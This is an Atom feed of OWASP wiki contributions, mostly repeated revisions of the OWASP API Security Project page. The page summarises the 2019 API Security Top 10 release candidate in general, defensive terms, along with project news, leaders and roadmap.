<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=ErezYalon</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=ErezYalon"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/ErezYalon"/>
		<updated>2026-05-15T15:17:04Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=255025</id>
		<title>User:ErezYalon</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:ErezYalon&amp;diff=255025"/>
				<updated>2019-09-30T10:34:14Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added OWASP events&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Bio ==&lt;br /&gt;
Erez Yalon is the leader of the OWASP API Security project and the Head of Security Research at [http://www.checkmarx.com/ Checkmarx].&lt;br /&gt;
* Speaker in OWASP events: Global AppSec Amsterdam 2019, Global AppSec DC 2019, Global AppSec TLV 2019, Appsec US 2018, AppSec EU 2017, AppSec IL 2016.&lt;br /&gt;
* Speaker in other events: DEF CON 26, BSides Las Vegas 2018, Nullcon 2018, CyberWeek TLV 2017.&lt;br /&gt;
* Contributing to OWASP projects.&lt;br /&gt;
* Conducting OWASP Top 10 workshops in universities&lt;br /&gt;
Contact: &lt;br /&gt;
[[File:Emailaddress.png]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255024</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255024"/>
				<updated>2019-09-30T10:29:22Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added Main Collaborator&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and was presented during Global AppSec DC 2019 and Global AppSec Amsterdam 2019. Links to the presentations can be found in the News section on the right.&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:ErezYalon|Erez Yalon]]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
'''Main Collaborator'''&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf Presentation of the Release Candidate of the API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://ams.globalappsec.org/ OWASP Global AppSec Amsterdam]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC - Global AppSec AMS.pdf|thumb|Presentation - API Security Top 10 RC - Global AppSec AMS]]&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255023</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255023"/>
				<updated>2019-09-30T10:27:55Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* Project Leaders */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and was presented during Global AppSec DC 2019 and Global AppSec Amsterdam 2019. Links to the presentations can be found in the News section on the right.&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
| A10 || Insufficient Logging &amp;amp; Monitoring || Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
'''The OWASP API Security Project documents are free to use!'''&lt;br /&gt;
&lt;br /&gt;
The OWASP API Security Project is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
| style=&amp;quot;padding-left:25px;width:200px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:ErezYalon|Erez Yalon]]&lt;br /&gt;
* [[User:Inon|Inon Shkedy]]&lt;br /&gt;
=== Main Collaborator ===&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
== Quick Links ==&lt;br /&gt;
&lt;br /&gt;
[https://groups.google.com/a/owasp.org/d/forum/api-security-project Google Group]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security GitHub]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/OWASP/API-Security/raw/master/2019/en/dist/owasp-api-security-top-10.pdf PDF version of API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/5/59/API_Security_Top_10_RC.pdf Presentation of the Release Candidate of the API Security Top 10]&lt;br /&gt;
&lt;br /&gt;
== News ==&lt;br /&gt;
&lt;br /&gt;
=== Sep 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://ams.globalappsec.org/ OWASP Global AppSec Amsterdam]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC - Global AppSec AMS.pdf|thumb|Presentation - API Security Top 10 RC - Global AppSec AMS]]&lt;br /&gt;
&lt;br /&gt;
=== Sep 13, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The RC of API Security Top-10 List was published during [https://dc.globalappsec.org/ OWASP Global AppSec DC]&lt;br /&gt;
&lt;br /&gt;
[[File:API Security Top 10 RC.pdf|thumb|Presentation - API Security Top 10 RC]]&lt;br /&gt;
&lt;br /&gt;
=== May 30, 2019 ===&lt;br /&gt;
&lt;br /&gt;
The API Security Project was Kicked-Off during [https://telaviv.appsecglobal.org/ OWASP Global AppSec Tel Aviv]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP APIs Security Project Kick Off.pdf]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | rowspan=&amp;quot;3&amp;quot; width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:New projects.png|100px|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | width=&amp;quot;50%&amp;quot; valign=&amp;quot;top&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]] &lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot; | [[File:Project_Type_Files_DOC.jpg|link=]]   &lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Acknowledgments =&lt;br /&gt;
&lt;br /&gt;
==Founders==&lt;br /&gt;
* Erez Yalon&lt;br /&gt;
* Inon Shkedy&lt;br /&gt;
&lt;br /&gt;
==Sponsors==&lt;br /&gt;
[[File:Checkmarx-Logo-Horizontal-black-512px.png|left|Checkmarx Logo]]&lt;br /&gt;
[[File:SALT Logo.jpg|512px|none|left|SALT Logo]]&lt;br /&gt;
&lt;br /&gt;
==Main Maintainer==&lt;br /&gt;
* Paulo Silva&lt;br /&gt;
&lt;br /&gt;
==Contributors==&lt;br /&gt;
* David Sopas&lt;br /&gt;
* Chris Westphal&lt;br /&gt;
&lt;br /&gt;
= Join =&lt;br /&gt;
&lt;br /&gt;
== Google Group ==&lt;br /&gt;
Join the discussion on the [https://groups.google.com/a/owasp.org/d/forum/api-security-project OWASP API Security Project Google group].&lt;br /&gt;
&lt;br /&gt;
This is the best place to introduce yourself, ask questions, suggest and discuss any topic that is relevant to the project.&lt;br /&gt;
&lt;br /&gt;
== GitHub ==&lt;br /&gt;
The project is maintained in the [https://github.com/OWASP/API-Security OWASP API Security Project repo].&lt;br /&gt;
&lt;br /&gt;
'''The latest changes are under the [https://github.com/OWASP/API-Security/tree/develop develop branch].'''&lt;br /&gt;
&lt;br /&gt;
Feel free to open or solve an [https://github.com/OWASP/API-Security/issues issue].&lt;br /&gt;
&lt;br /&gt;
Ready to contribute directly into the repo? Great! Just make you you read the [https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md How to Contribute guide].&lt;br /&gt;
&lt;br /&gt;
= Road Map =&lt;br /&gt;
&lt;br /&gt;
==Planned Projects==&lt;br /&gt;
* API Security Top 10&lt;br /&gt;
* API Security Cheat Sheet&lt;br /&gt;
* crAPI ('''C'''ompletely '''R'''idiculous '''API''' - an intentionally vulnerable API project)&lt;br /&gt;
&lt;br /&gt;
==Road Map==&lt;br /&gt;
[[File:Roadmap.png|left|Roadmap]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  &lt;br /&gt;
[[Category:OWASP_Builders]] &lt;br /&gt;
[[Category:OWASP_Breakers]] &lt;br /&gt;
[[Category:OWASP_Defenders]]  &lt;br /&gt;
[[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255022</id>
		<title>OWASP API Security Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_API_Security_Project&amp;diff=255022"/>
				<updated>2019-09-30T10:20:21Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: /* News */ Added the Amsterdam presentation of the Top 10 RC&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- DO NOT ALTER OR REMOVE THE TEXT ON NEXT LINE --&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; valign=&amp;quot;top&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What is API Security?==&lt;br /&gt;
&lt;br /&gt;
A foundational element of innovation in today’s app-driven world is the API. From banks, retail and transportation to IoT, autonomous vehicles and smart cities, APIs are a critical part of modern mobile, SaaS and web applications and can be found in customer-facing, partner-facing and internal applications. By nature, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII) and because of this have increasingly become a target for attackers. Without secure APIs, rapid innovation would be impossible. &lt;br /&gt;
&lt;br /&gt;
API Security focuses on strategies and solutions to understand and mitigate the unique vulnerabilities and security risks of Application Programming Interfaces (APIs).&lt;br /&gt;
&lt;br /&gt;
==API Security Top 10 Release Candidate is Here!==&lt;br /&gt;
&lt;br /&gt;
The RC version is finally ready and was presented during Global AppSec DC 2019 and Global AppSec Amsterdam 2019. Links to the presentations can be found in the News section on the right.&lt;br /&gt;
Here is a sneak peek:&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| A1 || Broken Object Level Authorization || APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.&lt;br /&gt;
|-&lt;br /&gt;
| A2 || Broken Authentication || Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising system's ability to identify the client/user, compromises API security overall.&lt;br /&gt;
|-&lt;br /&gt;
| A3 || Excessive Data Exposure || Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client's state, servers receive more-and-more filters which can be abused to gain access to sensitive data.&lt;br /&gt;
|-&lt;br /&gt;
| A4 || Lack of Resources &amp;amp; Rate Limiting || Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.&lt;br /&gt;
|-&lt;br /&gt;
| A5 || Broken Function Level Authorization || Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.&lt;br /&gt;
|-&lt;br /&gt;
| A6 || Mass Assignment || Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.&lt;br /&gt;
|-&lt;br /&gt;
| A7 || Security Misconfiguration || Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.&lt;br /&gt;
|-&lt;br /&gt;
| A8 || Injection || Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.&lt;br /&gt;
|-&lt;br /&gt;
| A9 || Improper Assets Management || APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.&lt;br /&gt;
|-&lt;br /&gt;
